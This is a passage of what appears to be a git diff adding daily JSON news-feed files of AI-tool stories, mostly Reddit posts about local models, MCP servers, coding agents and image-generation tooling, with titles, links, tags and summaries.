Back then, I said it didn't have auto-captioning. Well... forget that. I’ve just released a **massive update (v4.0 Pro)**, and it changes everything! 🚀 It went from a simple selection tool to a complete, desktop-like Data Engineering suite to prepare your AI model training. **Here is what’s new and what it does now:** 🤖 **Local AI Assistant (VLM/LLM Integration):** Connect seamlessly to Ollama or LM Studio! You can now use local vision models to **Auto-Caption** your images from scratch, hunt down \"hallucinated\" tags, or use the *Concept Isolator* (describes the background but ignores the subject—perfect for character LoRAs!). It can even translate your Booru tags into natural language sentences for Flux. 📚 **Word Library & Mass Batch Editing:** A brand new interactive library. Save your favorite concepts, check them, and Add, Remove, or Replace them across hundreds of selected images in a single click. 🌍 **Live Translation Assistant:** Not a native English speaker? Type your ideas in your own language, and the live preview will instantly translate and inject them into your captions using `deep-translator`. 🖼️…", + "category": "creative_tools" + }, + { + "title": "I am getting this error with adetailer on forge neo. 
The extension was working a week or two ago, but now it is not", + "url": "https://reddit.com/r/StableDiffusion/comments/1t7tdsd/i_am_getting_this_error_with_adetailer_on_forge/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 0.9, + "date": "2026-05-09T03:25:21.000Z", + "summary": "Error running postprocess_image: D:\\Programs\\sd-webui-forge-neo\\extensions\\adetailer\\scripts\\!adetailer.py Traceback (most recent call last): File \"D:\\Programs\\sd-webui-forge-neo\\modules\\scripts.py\", line 941, in postprocess_image script.postprocess_image(p, pp, *script_args) ~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^ File \"D:\\Programs\\sd-webui-forge-neo\\extensions\\adetailer\\aaaaaa\\traceback.py\", line 173, in wrapper raise error from None Both the extension and forge neo has been updated to the latest version. I've tried deleting and redownloading the venv folder as well as checking for updates in the extensions tab. Any help would be appreciated please.", + "category": "creative_tools" + }, + { + "title": "OpenAI launches new voice intelligence features in its API", + "url": "https://techcrunch.com/2026/05/07/openai-launches-new-voice-intelligence-features-in-its-api/", + "source": "TechCrunch AI", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 0.8600000000000001, + "date": "2026-05-09T18:00:20.148Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Anyone else using LTX locally on Mac via Draw Things? 
Here’s a WWII-style short I made.", + "url": "https://reddit.com/r/StableDiffusion/comments/1t8lagy/anyone_else_using_ltx_locally_on_mac_via_draw/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-09T20:36:05.000Z", + "summary": "Vibe ‘creating’? Maybe ‘directing’? Whatever you want to call it, this week I started with the image of a dog man in a glass box and over several evenings put together this WWII-inspired short. No planning, just playing, and it was a lot of fun. All images were created using OpenAI’s Images 2, given motion with Lightricks' LTX 2.3 via Draw Things, and stitched and mixed in DaVinci Resolve. The music was created in Suno, with the sound effects and VO generated in ElevenLabs. Yes, the main character’s consistency could be better, but with a planned-out character/turnaround sheet, that should be easily resolved. I’m really excited for future releases of LTX and Draw Things as they make image-to-video generation more accessible to Mac users. Let me know what you think and what you're using to generate AI video locally?", + "category": "creative_tools" + }, + { + "title": "ds4 webui", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t8ho70/ds4_webui/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-09T19:48:46.000Z", + "summary": "Hey guys I made a minimal web ui for ds4.c server (https://github.com/antirez/ds4), it's open source so you can try it too (if you can!) Here's what it looks like, running on M3 Ultra 256GB Memory, using the smaller model (q2). Not sped up. 1X speed. Pretty fast. Caveat (big caveat): You need at least 128GB memory Apple Silicon mac. 
* github: [https://github.com/cocktailpeanut/ds4.pinokio](https://github.com/cocktailpeanut/ds4.pinokio) * more details on x: [https://x.com/cocktailpeanut/status/2053193902694256758?s=20](https://x.com/cocktailpeanut/status/2053193902694256758?s=20) I tried a bunch of prompts and it's surprisingly good, including the one i tried in the video!", + "category": "ai_models" + }, + { + "title": "I'm disappointed", + "url": "https://reddit.com/r/ClaudeAI/comments/1t8dmdv/im_disappointed/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-09T18:56:31.000Z", + "summary": "I'm furious at Anthropic and the way they've handled their resource issues! They've been sneaky and manipulative. I use Claude via API access and could barely use it anymore because it had gotten so damn expensive. I spent days trying to fix a caching issue that wasn’t even my fault. Quietly and secretly reducing the 1-hour cache to 5 minutes, increasing the costs 10–20 times, and not even communicating that. And then.... Like a miracle. Everything’s back to normal. 100% cache hits. And that wasn’t a coincidence. The Musk deal and the extra GPUs. And suddenly they fixed the bug. And that’s not the only thing they’re pulling. What’s so hard about just issuing an official statement and saying, “Hey guys. We’re having massive issues right now and can’t handle the requests anymore. We’re sorry, but because of this, we have to do XY until we find a solution.\"", + "category": "ai_tools" + }, + { + "title": "What is the --novram thing in regards to LTX? I saw someone briefly explain it in a way that made it sound like it causes your GPU to not even get used, but I assume I misunderstood. 
(I'm a noob, and I need some help understanding a few th…", + "url": "https://reddit.com/r/StableDiffusion/comments/1t89tyx/what_is_the_novram_thing_in_regards_to_ltx_i_saw/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-09T16:37:05.000Z", + "summary": "**Back-story/intro, side-questions, etc, since I am new to this sub, and new to using local diffusion models (you can of course scroll down past this part, down to the \"Main Question\" down way further below, if you aren't in the mood for all the back-story and side-topics and side-questions):** Hey everyone, I've been reading and posting on LocalLLama a lot the past few months, but only just very recently started lurking StableDiffusion, and recently got into image-generation on the \"Draw Things\" app with Z Image Turbo). I got interested in local LLMs a few months ago, and I've always been pretty computer-illiterate, so, I decided to just get a Mac Studio (m4 max with 128GB memory) as the easy, convenient, works right out of the box setup to get started, since I've never built a computer before and don't know much about, things like setting it up or installing drivers, or using the command line, or setting up linux, or however all the setup involved works. And, I knew the 128GB unified memory meant it would be able to run some fairly decent sized LLMs at decent speeds, up to around ~120b for Q4, which isn't too terrible for $3,500. And this was in December so the RAM prices were s…", + "category": "creative_tools" + }, + { + "title": "Should we use a non-thinking model for code after using a thinking one for plan? 
(Agentic coding)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t8750p/should_we_use_a_nonthinking_model_for_code_after/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-09T14:53:46.000Z", + "summary": "I usually use Qwen3.6 27B (slow as heck on my RX 6800 but it works) for plan and Qwen3.6 35B A3B for the coding. But I was thinking the other day if I should remove the thinking from the code model. Is there a way to disable the thinking from the code model just for the initial hand-off from plan to code but keep it afterwards? My reasoning is that this might help in following instructions from the plan more directly but dealing with any new tools/information the plan model did not on its turn. Any insight will be appreciated.", + "category": "ai_models" + }, + { + "title": "TVCG 2026: MARRS for Human Motion Action-Reaction Synthesis", + "url": "https://reddit.com/r/StableDiffusion/comments/1t853hg/tvcg_2026_marrs_for_human_motion_actionreaction/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-09T13:30:38.000Z", + "summary": "# MARRS: Masked Autoregressive Unit-based Reaction Synthesis **Project page:** [**https://aigc-explorer.github.io/MARRS/**](https://aigc-explorer.github.io/MARRS/) Introducing **MARRS**: a new framework for human action-reaction synthesis that generates coordinated, fine-grained reactions conditioned on another person’s motion. By avoiding VQ and modeling body/hand units with **UD-VAE + ACF + MUM**, MARRS captures cross-unit perception more effectively and efficiently. It achieves state-of-the-art quantitative and qualitative results. 
[Overall framework](https://preview.redd.it/xz6zigx2640h1.png?width=3428&format=png&auto=webp&s=aea07ec6b54dcf1eb6087761eaeeb3f782eba32f) [Demo](https://reddit.com/link/1t853hg/video/jutjq2s4640h1/player)", + "category": "creative_tools" + }, + { + "title": "HiDream-O1-Image Internal Prompt", + "url": "https://reddit.com/r/StableDiffusion/comments/1t848nj/hidreamo1image_internal_prompt/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-09T12:54:26.000Z", + "summary": "for those who might have missed my post [here](https://www.reddit.com/r/StableDiffusion/comments/1t7v9fy/comment/oktaibu/?context=1) I wanted to resurface the internal prompt that this new model appears to use. This is found in their [prompt.py](http://prompt.py) file on the repo. **Translated Version:** `You are a Prompt Engineering Engine — an AI image-generation Prompt Engineer who is also a creative director with encyclopedic knowledge and visual-direction skill. Your task is to analyze the user's raw image request, infer implicit knowledge and the best visual approach, and rewrite it into a clear, detailed English prompt that is directly usable for image generation.` `## Core Goal` `Image generation models can only execute direct visual descriptions; they cannot fill in background knowledge, logical relations, or text content on their own. 
Therefore you must complete knowledge resolution, spatial planning, and visual direction in advance, and write the results explicitly into the prompt.` `Use the SCALIST framework to expand every scene:` `- **Subject**: identity, appearance, color, material, texture, action, expression, clothing.` `- **Composition**: shot type, viewpoint, su…", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-10.json b/data/news-feed-2026-05-10.json new file mode 100644 index 0000000..5a1189e --- /dev/null +++ b/data/news-feed-2026-05-10.json @@ -0,0 +1,253 @@ +{ + "generated": "2026-06-05T00:44:38.871Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-10", + "article_count": 15, + "archived_story_count": 320, + "articles": [ + { + "title": "A MCP universal integration layer Cli tool. It connects to other AI tools to a shared context, task, and memory bus", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t9kom7/a_mcp_universal_integration_layer_cli_tool_it/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "mcp", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-10T22:16:42.000Z", + "summary": "The developer has released a new project on GitHub named Via. [https://github.com/Vektor-Memory/Via](https://github.com/Vektor-Memory/Via) This one has a feature no other tool has currently. Ask the same question to Claude and Cursor, then see exactly where they agree, diverge, and what unique concepts each one brought. I know the people on this sub-reddit have many issues with the conversion of llm's between different resources. 
I would encourage people to check out this project and see if there is any use for this tool and advise what you want added in?", + "category": "ai_models" + }, + { + "title": "we stopped paying $6-10 per coding session by fixing how my AI reads my codebase", + "url": "https://reddit.com/r/ClaudeAI/comments/1t95jkw/we_stopped_paying_610_per_coding_session_by/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-10T12:24:20.000Z", + "summary": "We were spending $2-6/query on Claude Code 4.7 tokens because every session started with the model re-reading dozens of files to understand my repo. Same files, same context, every single time. Although, 70% gets reread from the cache in a session at 90% discount, but cache doesnt cross over to new session. The fix wasn't a better model or a bigger context window. It was giving the model structured memory so it doesn't need to re-read everything. I built a local server that indexes a codebase into a graph database. Every file gets a purpose, summary, and business context generated by an LLM, plus links to its functions, classes, and imports. Then the AI queries that graph through MCP instead of reading raw files. Most code questions now resolve in 2-4 targeted lookups instead of dumping the whole repo into context. Session costs went from dollars to cents. The wild part is it works just as well with open source models. I've tested with DeepSeek-V4 and Kimi-2.6 and the accuracy holds up because the retrieval is doing the heavy lifting, not the model size. Everything runs locally, no cloud, single tenant. 
I open sourced it recently: [github.com/ByteBell/bytebell-oss](http://github.c…", + "category": "ai_tools" + }, + { + "title": "Sharing \"cull\" : my open-source dataset tool for image scraping & classification & captioning pipeline", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t9jub0/sharing_cull_my_opensource_dataset_tool_for_image/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-10T21:42:02.000Z", + "summary": "I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \\~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. 
# Two example use cases I a…", + "category": "ai_models" + }, + { + "title": "Sharing \"cull\" : my open-source dataset tool for image scraping & classification & captioning pipeline", + "url": "https://reddit.com/r/StableDiffusion/comments/1t9jo0q/sharing_cull_my_opensource_dataset_tool_for_image/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-10T21:34:48.000Z", + "summary": "I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \\~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. 
# Two example use cases I a…", + "category": "creative_tools" + }, + { + "title": "Built an MCP that gives Claude Code the ability to watch screen recordings of UI bugs", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9frna/built_an_mcp_that_gives_claude_code_the_ability/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-10T19:04:30.000Z", + "summary": "One thing Claude Code can't do natively is watch a video. For most bugs that's fine, but for anything visual, hover states, animations, scroll behavior, you end up spending more time describing the bug than actually fixing it. I built motif to handle this. You record the bug, point motif at the file, and it returns what's visually happening, the root cause, and a diff. It uses Gemini 2.5 Flash as it processes video as a frame sequence rather than a single screenshot. That distinction matters when the bug is a 200ms overshoot or a hover state that resets at the wrong time. Setup is a Gemini API key and two lines in your mcp.json. After that you just tell Claude Code to watch the recording.That's the whole interface. `npx motif-mcp` to try it. Repo: [https://github.com/Ashad001/motif](https://github.com/Ashad001/motif), still early so feedback is welcome. 
https://reddit.com/link/1t9frna/video/xd83w09fyc0h1/player", + "category": "ai_tools" + }, + { + "title": "Speeding up local LLM for usable coding agent", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t96kfh/speeding_up_local_llm_for_usable_coding_agent/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-10T13:11:42.000Z", + "summary": "**TL;DR: Qwen 3.6 35B-A3B** (Q4\\_K\\_M) **is running slow at around 9 t/s with 72% filled context (36147 tokens window) and a total response time of 77s including prefill and token generation. Ran this using LM Studio on Windows with the attached image settings, on a 5060 Ti (16GB VRAM) + 32GB system RAM. I don't consider this performance great for my planned coding agent use case, so how can I speed this up? If I can't meaningfully speed it up, what other still-useful, faster LLMs do you suggest for my hardware specs?** Hello! As I see prices becoming tighter around cloud LLMs, I decided to look into local AI coding as a backup in case of a cloud LLM \"apocalypse\" or whenever I need to work with critical private software (I'm aware AI coding agents shouldn't be completely trusted around such things, I know the precautions to take). I have a 5060 Ti (16GB VRAM) + 32 GB system RAM. To test if my hardware is capable of hosting a competitive local AI, I decided to load Qwen 3.6 35B-A3B into LM Studio, which uses a llama.cpp backend. Loading it with around 32K context window, it runs at a decent speed of 17 t/s with just a simple \"Hi\" prompt. 
However, if you've used coding agents before…", + "category": "ai_models" + }, + { + "title": "Parax v0.7: Parametric Modeling in JAX [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1t929x3/parax_v07_parametric_modeling_in_jax_p/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-10T09:31:35.000Z", + "summary": "Hi everyone! Parax is a library for \"Parametric modeling\" in JAX, attempting to bridge the approach between pure JAX PyTrees, and more object-orientated modeling approaches (e.g. using [Equinox](https://github.com/patrick-kidger/equinox)). v0.7 has been released, featuring a more polished API as well as some detailed examples in the documentation. Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters Two new examples in the docs that show off these features * [Bounded optimization](https://gvcallen.github.io/parax/examples/bounded_optimization_jaxopt/) (JAXopt) * [Bayesian sampling](https://gvcallen.github.io/parax/examples/bayesian_sampling_blackjax/) (BlackJAX) Perhaps the library is of use to someone, and feel free to leave any feedback! 
Cheers, Gary", + "category": "ai_research" + }, + { + "title": "I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring", + "url": "https://reddit.com/r/StableDiffusion/comments/1t9k9n8/i_built_an_open_source_hyperparameter_search_tool/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-10T21:59:30.000Z", + "summary": "I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. 
Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,…", + "category": "creative_tools" + }, + { + "title": "I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t9k8gy/i_built_an_open_source_hyperparameter_search_tool/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-10T21:58:12.000Z", + "summary": "I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. 
Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,…", + "category": "ai_models" + }, + { + "title": "I built a site to create free AI videos using LTX 2.3 running on my own GPUs", + "url": "https://reddit.com/r/StableDiffusion/comments/1t9juoy/i_built_a_site_to_create_free_ai_videos_using_ltx/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-10T21:42:29.000Z", + "summary": "Lately I’ve been working on my project [**loremotion.com**](http://loremotion.com) **.**The goal was simply to let anyone create AI videos without credits, subscriptions, or limits. To actually make that possible, I had to skip the APIs and build my own infrastructure. I’m mostly using open-source models like **LTX 2.3** and **Wan 2.1**. I’ve personally found LTX 2.3 (specifically the 1.1 distilled version) to give the best results for the speed I’m aiming for. Right now, I’ve capped it at 720p/10-second clips for both Text-to-Video and Image-to-Video. **The Hardware Setup:** I’m running this on my own cluster. I’ve got four of my own GPUs (30 and 40 series) and I rent the rest on-the-spot (A100s and RTX Pros). It actually keeps my costs incredibly low—around $8 a day—which is why I might be able to keep the generations free. all wired to Wan2GP **Performance:** Depending on which GPU grabs your task, a 720p 10-second render usually takes between **50 and 110 seconds**(if there's any way i can get much lower generation time, please do let me know) **Features:** * **Dashboard:** Your clips stay there for 48 hours before they’re cleared. * **Discover:** You can choose to push your b…", + "category": "creative_tools" + }, + { + "title": "Claude just hallucinated again and changed the whole workflow of my app. 
Do not run them autonomously 24/7.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9h8ug/claude_just_hallucinated_again_and_changed_the/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-10T19:59:58.000Z", + "summary": "With Claude Max plan, you'd think you're sorted but you're not. It just changed a major workflow in my app and was going to make a change that would have costed my a huge bad data injection in the DB. It's far from being an autonomous AI agent. It still hallucinates a lot and this is the reason I've not onboarded on the hype train of OpenClaw and other autonomous AI agents. Every weird person on my feed who's just hyping up OpenClaw is either using it for hobby projects, exploring it, or just building hype for click baits. These technologies are far from perfect and can cost you your business if left autonomous or unchecked. Be wise. Oversee your AI agents continously.", + "category": "ai_tools" + }, + { + "title": "My workflow: GPT for architecture and Claude Code for execution", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9etjy/my_workflow_gpt_for_architecture_and_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-10T18:29:54.000Z", + "summary": "I’m working on a large project with FastAPI, Nuxt, PHP, Redis, Qdrant, and several AI agent layers. Over time, I noticed that using Claude Code directly for big architectural decisions was not always the safest approach for my project. Claude Code is extremely strong when it understands the existing codebase and needs to edit files, run tests, refactor, and follow a clear implementation plan. But when I asked it to analyze a major feature or propose a large architecture change from scratch, I sometimes saw risky suggestions or directions that did not fully fit the project. 
So I changed my workflow. For big decisions, I first use ChatGPT 5.5 to analyze the architecture, challenge the idea, and create a clear draft or roadmap. Then I take that draft to Claude Code and ask it to verify it against the real codebase. Claude Code usually improves the practical details: service names, controllers, helpers, file paths, implementation constraints, and possible conflicts. After that, I ask Claude Code to create an implementation guide before touching the code. I review that guide again, then I let Claude Code execute step by step with a checklist. From my experience in this project, this fe…", + "category": "ai_tools" + }, + { + "title": "Anybody else noticing how good gemma-4-26b-a4b is with one-shotting three.js?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t9cle9/anybody_else_noticing_how_good_gemma426ba4b_is/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-10T17:07:14.000Z", + "summary": "I wrote up this little python app to cycle through a bunch of prompts like this: |Single HTML file using three.js from CDN. A central rotating MeshNormalMaterial torus knot. Place a bright Sprite (AdditiveBlending, soft circular canvas texture) at a position projected to screen, and 6 smaller sprites along the line from that position to screen center, each with different sizes/tints. Update positions each frame.| |:-| I have a .csv in there file with 80 or so of these little prompts to cycle through - It writes the code into a mock terminal window, detects a crash if needed, and then shows and archives the finished hmtl file. Really fun to mess around with. 
Link above is to a static demo - github page is here [https://github.com/RowanUnderwood/auto\\_demo\\_scener](https://github.com/RowanUnderwood/auto_demo_scener) No cherry picking here so there may be a few dead ones slipped into the archive :D", + "category": "ai_models" + }, + { + "title": "Weekend project: behaviour trees for LLM agents", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9ch5y/weekend_project_behaviour_trees_for_llm_agents/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-10T17:02:57.000Z", + "summary": "Just throwing this out there. I kept hitting a wall with my GitLabCE pipeline based Dev Team with smaller models (Saving $$$), whenever they tackled big work like a feature implementation task, somewhere in the middle they forget half the guardrails. More instructions made it worse. I've got some background in game AI and behaviour trees, and BTs solve this exact problem specifically by feeding instructions during traversal of the tree structure and outcomes at each node picks the path it goes down, the leaf encodes the instruction, the agent only ever sees the next instruction. I found if I had a project on GitHub and a Project on GitLab the agent just got really confused wasting tokens trying to figure out where to commit etc. So I spent a weekend working on the idea. abtree is a CLI. You write the workflow as a YAML tree. The agent uses the CLI to walk getting instructions one step at a time and persisting the cursor (current place in tree) and regenerating a Mermaid trace on every state change. 
One of the big things I like is it can essentially pause and resume executions so for example you can have raise an MR mid workflow, where I then approve the change, and then my pipelin…", + "category": "ai_tools" + }, + { + "title": "I made Claude Code aware of its own usage limits", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9ayg8/i_made_claude_code_aware_of_its_own_usage_limits/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-10T16:05:13.000Z", + "summary": "Something that's been annoying me for a while: Claude Code has no idea how much quota it's burned. You can see the usage bars in the UI, but the model itself is completely blind to them. There's no API, no tool, no hook that exposes the current rate limit state during a conversation. Turns out Anthropic returns rate limit headers on every inference response (\\`anthropic-ratelimit-unified-5h-utilization\\`, \\`anthropic-ratelimit-unified-7d-utilization\\`, etc.) — Claude Code receives them internally to render the UI bars, but never passes them anywhere the model can see. So I built a small local HTTP proxy that sits between Claude Code and \\`api.anthropic.com\\`. Claude Code already respects \\`ANTHROPIC\\_BASE\\_URL\\`, so setting that to \\`http://127.0.0.1:4080\\` routes all traffic through the proxy. It intercepts the response headers and writes a one-line status file to \\`\\~/.claude/usage-status.md\\`: \\`\\`\\` 5h=9% 7d=99%! overage=0% bottleneck=seven\\_day (10/05/2026, 16:19:04) \\`\\`\\` Claude can then read that file on demand, or you can inject it automatically via a \\`UserPromptSubmit\\` hook so it's present in every prompt. 
Add a rule to your [CLAUDE.md](http://CLAUDE.md) and Claude wil…", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-11.json b/data/news-feed-2026-05-11.json new file mode 100644 index 0000000..07c5260 --- /dev/null +++ b/data/news-feed-2026-05-11.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:39.131Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-11", + "article_count": 15, + "archived_story_count": 572, + "articles": [ + { + "title": "Orc (working name) - auditable and declarative AI workflow", + "url": "https://reddit.com/r/LocalLLaMA/comments/1ta8v5e/orc_working_name_auditable_and_declarative_ai/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-11T16:44:37.000Z", + "summary": "**I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense?** I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense? I’ve been working on an early project called ORC, short for Orchestration as Code. I’m at the stage where I’m mainly trying to gauge whether the concept is interesting/useful to other people, especially people running local models, Ollama, llama.cpp, LM Studio, MCP tools, or mixed local/cloud workflows. The basic idea is: Instead of building LLM workflows as Python orchestration soup, or wiring them together in a visual tool, ORC lets you describe workflows declaratively in .orc files. Roughly: Terraform-ish workflow definitions, but for LLM agents and tool use. A workflow can define things like: \\- agents \\- models/providers \\- tools \\- schemas \\- inputs \\- ordered execution steps \\- validation rules \\- output artefacts The goal is not to build a magical autonomous agent framework. The goal is more boring. 
make LLM workflows easier to read, version, review, validate, and run repeatedly. A rough example of the kind of thing I’m aiming for: `agent researcher:` `provider: ollama` `mod…", + "category": "ai_models" + }, + { + "title": "My pre-coding routine with Claude Code, 5 MCP servers before I write a single line", + "url": "https://reddit.com/r/ClaudeAI/comments/1ta3a9x/my_precoding_routine_with_claude_code_5_mcp/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-11T13:26:49.000Z", + "summary": "Been running this routine for months now. Started because I was losing too much time to Claude just guessing. Halluzinated class names, outdated SDK methods, advice that didn't match the codebase I was actually in. So I built a routine I run before I let it write anything. Takes maybe 60-90 seconds. Saved me hundreds of hours by now. 1. Start the session and load memory. A memory MCP carries context across sessions. Last sprint, open decisions, recent learnings, why we picked X over Y three months ago. Without this, every session starts cold and Claude 